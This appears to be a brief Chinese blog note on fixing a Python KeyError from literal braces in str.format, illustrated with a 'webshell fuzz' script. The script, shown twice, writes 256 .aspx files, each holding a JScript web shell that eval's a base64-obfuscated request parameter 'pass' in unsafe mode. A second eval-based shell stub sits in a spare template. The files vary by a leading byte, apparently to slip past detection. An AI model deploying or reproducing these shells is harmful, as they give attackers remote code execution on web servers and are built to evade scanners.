python2 format throw KeyError

出现这种情况是因为使用string的.format方法插入的字符串中包含大括号，只需要将大括号双写就可以正常运行

报这两种错误都是同一种问题，双写大括号即可解决
ValueError: expected ':' after format specifier

在进行webshell fuzz的时候遇到python报KeyError错误，参考地址：https://stackoverflow.com/questions/9623134/python-format-throws-keyerror

原始代码：

#!/usr/bin/env python
# coding:utf-8
import os

template_bak = """
<%@{0}Language="Jscript"%>
<%
eval/*tt*/(Response.Write("attack"));
%>"""
def generate(count):
    template = """{0}
<script runat="server" language="Jscript">
function popup(str){
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b = eval(str,a);
    return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJwYXNzIl0="))));
%>""".format(chr(count))
    with open(os.path.join(path, "fuzz_{}.aspx".format(count)), 'w') as f:
        f.write(template)
path = r"./fuzz/"
for c in range(0, 256):
    generate(c)

修改之后的代码

#!/usr/bin/env python
# coding:utf-8
import os

template_bak = """
<%@{0}Language="Jscript"%>
<%
eval/*tt*/(Response.Write("attack"));
%>"""
def generate(count):
    template = """{0}
<script runat="server" language="Jscript">
function popup(str){{
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b = eval(str,a);
    return(b);
}}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJwYXNzIl0="))));
%>""".format(chr(count))
    with open(os.path.join(path, "fuzz_{}.aspx".format(count)), 'w') as f:
        f.write(template)
path = r"./fuzz/"
for c in range(0, 256):
    generate(c)